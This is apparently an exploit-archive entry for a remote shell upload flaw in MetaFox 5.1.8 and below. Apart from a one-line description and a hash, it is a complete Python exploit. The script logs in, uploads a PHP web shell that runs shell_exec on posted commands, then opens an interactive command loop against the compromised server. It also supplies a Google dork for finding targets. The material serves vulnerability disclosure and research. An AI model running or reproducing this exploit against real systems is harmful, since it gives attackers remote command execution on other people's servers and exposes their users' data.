MetaFox versions 5.1.8 and below suffer from a remote shell upload vulnerability.
e2b323542d1ae762fd44f17402386b535064f3b92a9eb3e937211dc86f883e48
#!/usr/bin/env python3
# Exploit Title: MetaFox Remote Shell Upload
# Google Dork: "Social network for niche communities"
# Exploit Author: The Joker
# Vendor Homepage: https://www.phpfox.com
# Version: <= 5.1.8
import json
import requests
import sys
if len(sys.argv) != 4:
sys.exit("Usage: %s <URL> <Username> <Password>" % sys.argv[0])
requests.packages.urllib3.disable_warnings()
endpoint = sys.argv[1] + "/api/v1/user/login"
response = requests.post(endpoint, json={"username": sys.argv[2], "password": sys.argv[3]}, verify=False)
json_response = json.loads(response.text)
if not "access_token" in json_response:
sys.exit("Login failed!")
print("Login success! Uploading shell")
token = json_response["access_token"]
endpoint = sys.argv[1] + "/api/v1/files"
files = {"file[0]": ("wtf.php", "<?php print(shell_exec($_POST['command'])); ?>")}
response = requests.post(endpoint, files=files, headers={"Authorization": "Bearer " + token}, verify=False)
json_response = json.loads(response.text)
if not "data" in json_response or not "url" in json_response["data"][0]:
sys.exit("Upload failed!")
shell_url = json_response["data"][0]["url"]
print("Shell uploaded at %s\n" % shell_url)
while True:
command = input("$ ")
response = requests.post(shell_url, data={"command": command}, verify=False)
print(response.text)